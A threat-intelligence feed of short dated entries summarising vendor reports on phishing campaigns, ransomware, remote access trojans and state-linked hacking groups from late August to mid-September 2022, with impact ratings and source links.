- Intel Source:
- Cyble
- Intel Name:
- Japanese_Taxpayers_Targeted_in_Phishing_Campaign
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble Research & Intelligence Labs discovered a new phishing campaign imitating the National Tax Agency, which targets Japanese users by tricking them into sharing sensitive information.
Source:
https://blog.cyble.com/2022/09/13/phishing-campaign-targets-japanese-tax-payers/
—
- Intel Source:
- Cluster25
- Intel Name:
- One_of_the_most_used_infostealer_Erbium
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Cluster25′ analysts observed that Erbium can become one of the most used infostealer by cyber criminals due to its wide range of capabilities and due to the growing demand for M-a-a-S.
Source:
https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_Cyber_Actors_Exploiting_Known_Vulnerabilities
- Date of Scan:
- 2022-09-15
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA have identified Iranian Islamic revolutionary guard corps-affiliated cyber actors exploiting vulnerabilities for data extortion and disk encryption for ransom operations.
—
- Intel Source:
- Cyble
- Intel Name:
- Greek_Banking_Users_Targeted_in_Phishing_Campaign
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble discovered multiple URLs hosting pages pretending to be Greece’s tax refund website. In order to transfer funds, users must confirm their current account number and the amount of their tax refund.
Source:
https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek-banking-users/
—
- Intel Source:
- ProofPoint
- Intel Name:
- Hackers_Are_Using_Name_of_Queen_Elizabeth_II_in_Phishing_Attacks
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have identified threat actors exploiting the death of Queen Elizabeth II in phishing attacks to steal their targets’ Microsoft accounts.
Source:
https://twitter.com/threatinsight/status/1570092339984584705
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- New_Linux_SideWalk_backdoor_Variant_used_by_SparklingGoblin_APT_Hackers
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- ESET researchers have discovered a Linux variant of the SideWalk backdoor used by SparklingGoblin. This is a group of APTs that partially overlaps with APT41 and BARIUM in terms of its tactics, techniques, and procedures.
Source:
https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_masking_phishing_websites
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- During the collecting of various malware strains the ASEC analysts caught one targeting Korean users, which was being distributed continuously to Korean email accounts only since August. This phishing website’s URL is not only distributed through email but is also exposed among the top search results of the Google search engine.
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_new_variant_of_Agent_Tesla
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- The Agent Tesla keylogger’s developers announced and posted on the Agent Tesla Discord server that people should switch over to a new keylogger OriginLogger, a powerful software like Agent Tesla. OriginLogger is an AT-based software and has all the features. OriginLogger is a variant of Agent Tesla. As such, the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.
—
- Intel Source:
- Secureworks
- Intel Name:
- A_detailed_Analysis_of_Iranian_COBALT_MIRAGE_Threat_Group
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- Researchers at Secureworks have analyzed ransomware incidents and uncovered details about Iranian COBALT MIRAGE operations. During this incident, COBALT MIRAGE exploited ProxyShell vulnerabilities (CVE-2021-34473, 2021-34523, and 2021-30207).
Source:
https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Exploiting_Oracle_WebLogic_Server_Vulnerabilities
- Date of Scan:
- 2022-09-14
- Impact:
- MEDIUM
- Summary:
- Trendmicro researchers have observed malicious actors exploiting both newly disclosed and older Oracle WebLogic Server vulnerabilities to deliver cryptocurrency-mining malware.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Easy_Process_Injection_within_Python
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed malicious Python scripts. It can call any Microsoft API and perform process injection using the classic VirtualAlloc, CreateRemoteThreat, etc.
—
- Intel Source:
- Arcticwolf
- Intel Name:
- Mitel_VoIP_Appliance_Vulnerability_Exploited_by_Lorenz_Ransomware_Group
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliance for initial access into a victim’s network, Arctic Wolf cybersecurity firm researchers reported.
Source:
https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
—
- Intel Source:
- Microsoft
- Intel Name:
- Ransomware_Campaigns_Linked_to_Iranian_Govt’s_DEV_0270_Hackers
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Espionage_Activity_Targeting_Asian_Governments
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified a campaign that targets government and state-owned organizations in several Asian countries, including the offices of multiple prime ministers or heads of government.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
—
- Intel Source:
- ProofPoint
- Intel Name:
- Iranian_Hackers_Targeting_Nuclear_Security_and_Genomic_Research
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Proofpoint researchers have discovered a cyberespionage campaign conducted by TA453 threat actors linked to Iran. It targeted individuals specializing in nuclear security, Middle Eastern affairs, and genome research. To target their victims, threat actors used at least two actor-controlled personas.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Word_Documents_with_Suspicious_URL
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a quarantined email that is marked as phishing by Defender with the Subject: Urgent Payment Issue.
—
- Intel Source:
- DFIR Report
- Intel Name:
- Diving_Deep_into_Emotet_Malware
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- Researchers from DFIR have done a deep analysis of Emotet Malware
Source:
https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/
—
- Intel Source:
- Cofense
- Intel Name:
- A_new_form_of_delivery_of_the_Lampion_banking_trojan
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- Threat actors have been spotted by PDC analyst using a new form of Lampion malware thru using of a VBS loader. Using the trusted cloud platform used for payments, WeTransfer, threat actors are attempting to gain the trust of users while taking advantage of the service provided by the popular site.
Source:
https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Lazarus_Hackers_Targeting_Energy_Providers_Around_the_World
- Date of Scan:
- 2022-09-09
- Impact:
- MEDIUM
- Summary:
- A CiscoTalos study discovered that North Korea-linked Lazarus Group targeted energy providers around the world from February through July 2022, including U.S., Canadian, and Japanese companies.
Source:
https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- Collecting_Credentials_Through_Third-Party_Software
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- PaloAlto researchers explored some common third-party software scenarios related to credential gathering, examining how passwords are stored, retrieved, and monitored based on real-world attack scenarios.
Source:
https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Deep_Investigation_of_Albanian_Government_Cyberattacks
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- Microsoft researchers investigated Albanian government cyberattacks which disrupt public services and government websites. Besides the destructive cyberattack, MSTIC reports that an Iranian state-sponsored actor released sensitive information that had already been exfiltrated.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Ransomware_Developers_Leveraging_Intermittent_Encryption_to_Avoid_Detection
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that ransomware developers use intermittent encryption to evade detection. As a result of this encryption method, ransomware operators are able to evade detection systems and encrypt victims’ files more quickly.
—
- Intel Source:
- Secureworks
- Intel Name:
- Bronze_President_Group_Targeting_Government_Officials
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America.
Source:
https://www.secureworks.com/blog/bronze-president-targets-government-officials
—
- Intel Source:
- Cyble
- Intel Name:
- Bumblebee_Malware_Back_With_New_Technique
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from Cyble have came across a Twitter post wherein a researcher mentioned an interesting infection chain of the Bumblebee loader malware being distributed via spam campaigns.
Source:
https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/
—
- Intel Source:
- Google blog
- Intel Name:
- Conti_Cybercrime_Hackers_Targeting_Ukraine
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from Google Threat Analysis Group have identified some former Conti ransomware gang members are now part of a threat group tracked as UAC-0098, which is targeting Ukrainian organizations and European non-governmental organizations.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Moobot_Botnet_Targeting_Unpatched_D-Link_Routers
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have discovered attacks leveraging several vulnerabilities in D-Link routers and the vulnerabilities exploited include CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, and CVE-2022-28958.
Source:
https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2
—
- Intel Source:
- Mandiant
- Intel Name:
- In-depth_exploration_of_APT42
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Mandiant researchers have conducted a deep analysis of APT42 and published a report. This report examines APT42’s recent and historical activities, its tactics, techniques, and procedures, targeting patterns, and historical connections to APT35.
Source:
https://www.mandiant.com/media/17826
https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises
—
- Intel Source:
- BlackBerry
- Intel Name:
- An_Unusual_Case_of_Monti_Ransomware
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- The BlackBerry Incident Response team have investigated an attack by a previously unknown group, calling itself “MONTI,” which encrypted nearly 20 user hosts as well as a multi-host VMware ESXi cluster that brought down over 20 servers.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_new_remote_access_trojan_MagicRAT
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos have observed a new Remote Access Trojan from the Lazarus APT group being exploited in the wild for arbitrary command execution.
Source:
https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html
https://github.com/Cisco-Talos/IOCs/tree/main/2022/09
—
- Intel Source:
- Cybereason
- Intel Name:
- A_Deep_Examination_of_PlugX_RAT_Loader
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Cybereason researchers have investigated PlugX malware, a Remote Access Tool/Trojan (RAT) often used by Asian APT groups like APT27. With its many malicious “plugins,” the malware has backdoor capabilities that allow it to take complete control over the environment.
Source:
https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution
—
- Intel Source:
- CISA
- Intel Name:
- Vice_Society_Ransomware_Targeting_Education_Sector
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks and they provided the network defenders with Vice Society IOCs and TTPs observed by the FBI in attacks for September 2022.
—
- Intel Source:
- Wordsfence
- Intel Name:
- Zero-Day_Vulnerability_Exploited_in_BackupBuddy_Plugin
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Wordfence’s Threat Intelligence team have discovered a zero-day vulnerability being actively exploited in BackupBuddy. It is a WordPress plugin with approximately 140,000 installations. The vulnerability allows unauthenticated users to download sensitive information from the affected site.
—
- Intel Source:
- PRODAFT
- Intel Name:
- Diving_Deep_into_TA505_Group
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- Researchers from PRODAFT Threat Intelligence team have done in-depth analysis of TA505 Group. Also, identified the group’s control panel and used it to glean insight into how the organization works.
Source:
https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Ares_Banking_Trojan_Updated_with_Domain_Generation_Algorithm
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- In an update to the Ares banking trojan, researchers at Zscaler ThreatLabz observed a domain generation algorithm (DGA) that resembles Qakbot’s. Threat actors attempt to maximize the life of an infection, which provides them with the opportunity to monetize compromised systems through wire fraud and ransomware attacks.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Worok_Hackers_Targeting_Asian_Companies_and_Governments
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- The new cyberespionage group Worok have discovered by WeLiveSecuruty reserachers which targeted attacks that used undocumented tools against various high-profile companies and local governments mostly in Asia.
Source:
https://www.welivesecurity.com/2022/09/06/worok-big-picture/
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Attackers_Leveraging_Red_Teaming_Tools
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- Cyble Researchers have discovered threat actors actively using PowerShell Empire to spread multiple infections and also employ these tools to perform highly stealthy and dangerous attacks against their targets.
Source:
https://blog.cyble.com/2022/09/06/adversaries-actively-utilizing-powershell-empire/
—
- Intel Source:
- AT&T
- Intel Name:
- Shikitega_Malware_Targeting_Linux
- Date of Scan:
- 2022-09-06
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs have discovered a new malware named Shikitega targeting endpoints and IoT devices that are running Linux operating systems.
Source:
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
—
- Intel Source:
- TrendMicro
- Intel Name:
- Play_Ransomware_Following_the_Tactics_of_Hive_and_Nokoyawa_Ransomware
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Trendmicro researchers have investigated Play ransomware and found It uses many tactics that follow the playbook of both Hive and Nokoyawa ransomware, including similarities in the file names and file paths of their respective tools and payloads.
—
- Intel Source:
- Avast
- Intel Name:
- NoName057(16)_Hacker_Group_Targeting_Ukraine_Supporters_with_DDoS_Attack
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from Avast Threat Lab have identified a Pro-Russian Group named NoName057(16) that is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland
Source:
https://decoded.avast.io/martinchlumecky/bobik/?utm_source=rss&utm_medium=rss&utm_campaign=bobik
—
- Intel Source:
- TeamCymru
- Intel Name:
- A_Detailed_Analysis_of_Mythic_C2_Framework
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from TeamCymru have done detailed examinations of Mythic C2 Framework. It is a free-to-use, open-source tool, written in Python and provides cross-platform payload creation options for Linux, MacOS, and Windows.
Source:
https://team-cymru.com/blog/2022/09/06/mythic-case-study-assessing-common-offensive-security-tools/
—
- Intel Source:
- Checkpoint
- Intel Name:
- DangerousSavanna_Malicious_Campaign_Targeting_Financial_Institutions
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analysied a malicious campaign called DangerousSavanna which has been targeting multiple major financial service groups in French-speaking Africa for the last two years.
—
- Intel Source:
- SafeBreach
- Intel Name:
- A_New_CodeRAT_is_Being_Exposed
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- SafeBreach Labs researchers have discovered a new targeted attack and uncovered New Remote Access Trojan. It is targeting Farsi-speaking code developers using a Microsoft Dynamic Data Exchange (DDE) exploit.
Source:
https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/
—
- Intel Source:
- ASEC
- Intel Name:
- HWP_File_Exploit_OLE_Objects_and_Flash_Vulnerabilities
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened.
—
- Intel Source:
- TrendMicro
- Intel Name:
- BumbleBee_is_Refactored_Version_of_Bookworm_Backdoor
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro analyzed a backdoor with a unique modular architecture and named it BumbleBee due to a string embedded in it. The features of BumbleBee and Bookworm are similar, so BumbleBee is likely to be a refactored version of the latter and target Asian local governments.
—
- Intel Source:
- Resecurity
- Intel Name:
- EvilProxy_PhaaS_with_MFA_Bypass_Rising_in_DarkWeb
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from Resecurity have identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. The threat actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication.
—
- Intel Source:
- Cloudsek
- Intel Name:
- A_Detailed_Analysis_of_Redeemer_Ransomware
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from CloudSEK have deeply analyzed Redeemer Ransomware. It was initially identified in June 2021, and since then, four public versions (1.0, 1.5, 1.7, and 2.0) have been released.
—
- Intel Source:
- CSIRT
- Intel Name:
- Ransomware_targating_Microsoft_and_VMware_ESXiservers
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- CSIRT have reported an incident that affected a government service. The incident corresponds to ransomware that affected Microsoft and VMware ESXi servers in the corporate networks of the institution.
Source:
https://www.csirt.gob.cl/noticias/alerta-de-seguridad-cibernetica-incidente-en-servicio-publico/
—
- Intel Source:
- BitDefender
- Intel Name:
- Snake_Keylogger_Returns_with_New_Malspam_Campaign
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- According to BitDefender researchers, the IP addresses used in the attack originated from Vietnam, while the campaign’s main targets were based in the USA. To lure victims into opening ZIP archives, attackers use the profile of one of Qatar’s largest IT and cloud service providers. It contains an executable called CPMPANY PROFILE.exe.
—
- Intel Source:
- Zscaler
- Intel Name:
- Prynt_Stealer_Malware_Secret_Backdoor_Exposed
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have uncovered the Prynt Stealer builder, attributed with WorldWind, and DarkEye has a secret backdoor in the code that ends up in every derivative copy and variant of these malware families.
—
- Intel Source:
- Uptycs
- Intel Name:
- ELF_Based_Ransomware_targating_Linux_system
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have observed an Executable and Linkable Format (ELF) ransomware which encrypts the files inside Linux systems based on the given folder path and they dropped a README note.
Source:
https://www.uptycs.com/blog/another-ransomware-for-linux-likely-in-development
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Evidence_of_Connection_between_Raspberry_Robin_malware_and_Dridex
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from IBM have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators’ connections to the Russia-based Evil Corp group.
Source:
https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
—
- Intel Source:
- Redacted
- Intel Name:
- Diving_Deep_into_BianLian_Ransomware
- Date of Scan:
- 2022-09-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Redacted have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_AgentTesla_malware_increased_distribution
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- CERT-UA has tracked mass mailings of emails with the topic “Technisches Zeichnen” and attached to the e-mail is an IMG file containing a CHM file of the same name, opening which will execute JavaScript code.
—
- Intel Source:
- Cybereason
- Intel Name:
- Ragnar_Locker_Ransomware_Targeting_Energy_Sector
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have investigated the Ragnar Locker malware family, a ransomware and a ransomware operator which has recently claimed to have breached DESFA, a Greek pipeline company.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_MS_Word_Files_Targeting_North_Korea
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea.
—
- Intel Source:
- BitDefender
- Intel Name:
- Diving_Deep_into_Industrial_Espionage_Operation
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- BitDefender researchers have analyzed corporate espionage in depth. As it is one of the common misconceptions that espionage is affecting only large corporations or government entities, but it is more common than expected.
Source:
https://businessinsights.bitdefender.com/deep-dive-into-a-corporate-espionage-operation
—
- Intel Source:
- ASEC
- Intel Name:
- RAT_Tool_Distributed_on_Github_as_Solution_File
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered a RAT Tool disguised as a solution file (*.sln) on GitHub. To avoid detection, the malware disguised itself as a solution file. Upon execution, it injects into normal Windows programs, such as AppLaunch.exe, RegAsm.exe, and InstallUtil.exe, to run a RAT.
—
- Intel Source:
- Cyble
- Intel Name:
- MagecartJavaScriptSkimmerStealingPaymentInformation
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from Cyble Intelligence Labs have identified that JavaScript skimmer created by the Magecart threat group has been stealing payment information from the Magento e-commerce website.
Source:
https://blog.cyble.com/2022/09/01/highly-evasive-magecart-javascript-skimmer-active-in-the-wild/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Hackers_Using_ModernLoader_RAT_to_Infect_Systems_with_Stealers_and_Cryptominers
- Date of Scan:
- 2022-09-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have observed three distinct campaigns between March and June 2022 that delivered a number of threats, including the ModernLoader bot, the RedLine information stealer, and cryptocurrency mining malware.
Source:
https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_cash_payments_online_fraud
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- CERT-UA observed an increase in the number of scam pages in the Facebook social network. The content of these pages refers to the topic of monetary compensation, the eHelp platform, financial assistance from various organizations and partners.
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- A_new_wild_version_of_ChromeLoader
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Cybergeeks analyzed a new version of ChromeLoader (also known as Choziosi Loader)last couple weeks weeks and it appears that this campaign that has become widespread and has spawned multiple versions, making atomic indicators ineffective for detections.
Source:
https://cybergeeks.tech/chromeloader-browser-hijacker/
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Leveraging_Fast_Reverse_Proxy_tool_to_Attack_Korean_Companies
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified hackers scanning and attacking externally accessible corporate PCs such as IIS web servers or MS Exchange servers. Afterward, they use Webshell to access a part of the system and abuse Potato or Exploit tools that support privilege escalation, thereby obtaining system privileges.
—
- Intel Source:
- ASEC
- Intel Name:
- VBScript_downloads_a_malicious_HWP_file
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC team have discovered a VBScript that downloads a malicious HWP file and the distribution path of malware is yet to be determined, but the VBScript is downloaded through curl.
—
- Intel Source:
- Netlab 360
- Intel Name:
- The_activation_of_PureCrypter_Loader_continues
- Date of Scan:
- 2022-08-31
- Impact:
- MEDIUM
- Summary:
- Researchers from Netlab have identified that PureCrypter Loader is continued to be active this year, and spread over 10 other families including Formbook, SnakeKeylogger, AgentTesla, Redline, AsyncRAT, and more.
Source:
https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/
—
- Intel Source:
- AT&T
- Intel Name:
- Crypto_miners_updated_with_latest_techniques
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Researchers from AT&T Alien Labs have provided an overview of an ongoing crypto mining campaign that caught our eye due to the big number of loaders that have shown up during the month of June, as well as how staged the execution is for a simple malware like a miner.
Source:
https://cybersecurity.att.com/blogs/labs-research/crypto-miners-latest-techniques
—
- Intel Source:
- Netskope
- Intel Name:
- AsyncRAT_Leveraging_Fully_Undetected_Downloader
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Researchers from Netskope have analysied the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by the MalwareHunterTeam to the last payload. Although no AV vendor is detecting the file, it contains many detections via Sigma and IDS rules, as well as by sandboxes used by VirusTotal.
Source:
https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader
—
- Intel Source:
- Cyble
- Intel Name:
- Mini_Stealer_Builder_and_Panel_For_Free
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs have discovered a post on a cybercrime forum where a Threat Actor released MiniStealer’s builder and panel for free, and they claim that the stealer can target operating systems such as Windows 7, 10, and 11.
Source:
https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/
—
- Intel Source:
- Securonix
- Intel Name:
- New_Golang_Attack_Campaign_GO#WEBBFUSCATOR_Leverages_Office_Macros
- Date of Scan:
- 2022-08-30
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs Threat Research Team has analysed recently a unique sample of a persistent Golang-based attack campaign tracked by Securonix as GO#WEBBFUSCATOR who infects the target system with the malware.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA423_threat_group_targeting_countries_in_South_China_Sea
- Date of Scan:
- 2022-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint and Pwc threat intelligence team have identified a phishing campaign, running for over a year and currently ongoing, and targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the United States.
Source:
https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea
—
- Intel Source:
- CheckMarx
- Intel Name:
- First_Known_Phishing_Attack_Against_PyPI_Users
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from CheckMarx have identified an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to the packages in the repository, and It is the first known phishing attack against Python Package Index, PyPI.
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Crypto_Miner_Malware_Campaign_Named_Nitrokod
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have detected a cryptomining campaign, called Nitrokod, which potentially infected thousands of machines worldwide. It is created by a Turkish speaking entity and the campaign dropped malware from free software available on popular websites such as Softpedia and uptodown.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- Remcos_RAT_updated_with_New_TTPs
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from SOCInvestigation have identified new TTPs of Remcos RAT. It is a dangerous trojan available to attackers for a relatively low price and it comes equipped with enough robust features to allow attackers to set up their own effective botnets.
Source:
https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/
—
- Intel Source:
- Sentilone
- Intel Name:
- The_emerging_of_BlueSky_ransomware
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- The researchers paid close attention again to BlueSky late June 2022. SentinelOne observed this ransomware has being spread via trojanized downloads from questionable websites as well as in phishing emails.
—
- Intel Source:
- Cloudsek
- Intel Name:
- TeamTNT_Group_Targeting_Cloud_Instances_and_Containerized_Environments
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- CloudSEK researchers have identified the known threat actor TeamTNT has been targeting cloud instances and containerized environments on systems around the world for at least two years.
Source:
https://cloudsek.com/threatintelligence/timeline-ttps-of-teamtnt-cybercrime-group/
—
- Intel Source:
- Mitiga
- Intel Name:
- Spear-phishing_and_AiTM_Used_to_Hack_MS_Office_365_Accounts
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Mitiga Research Team have identified a sophisticated, advanced business email compromise (BEC) campaign, directly targeting relevant executives of organizations using Office 365.
Source:
https://www.mitiga.io/blog/advanced-bec-scam-campaign-targeting-executives-on-o365
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_deployment_of_32-bits_or_64-bits_malware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- The reseracher did some experiment by dowloading some samples from MalwareBazaar and got a report of some interesting stats based on YARA rules.
Source:
https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968
—
- Intel Source:
- HC3
- Intel Name:
- A_Deep_Analysis_of_Karakurt_Ransomware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from HC3 have analyzed Karakurt Threat Profile deeply and identified four attacks affecting the US Healthcare and Public Health Sector since June 2022. The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital.
Source:
https://www.hhs.gov/sites/default/files/karakurt-threat-profile-analyst-note.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Agenda_Ransomware_Customized_for_Each_Victim
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a new ransomware that is written in the Go programming language and targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.
Source:
https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html
—
- Intel Source:
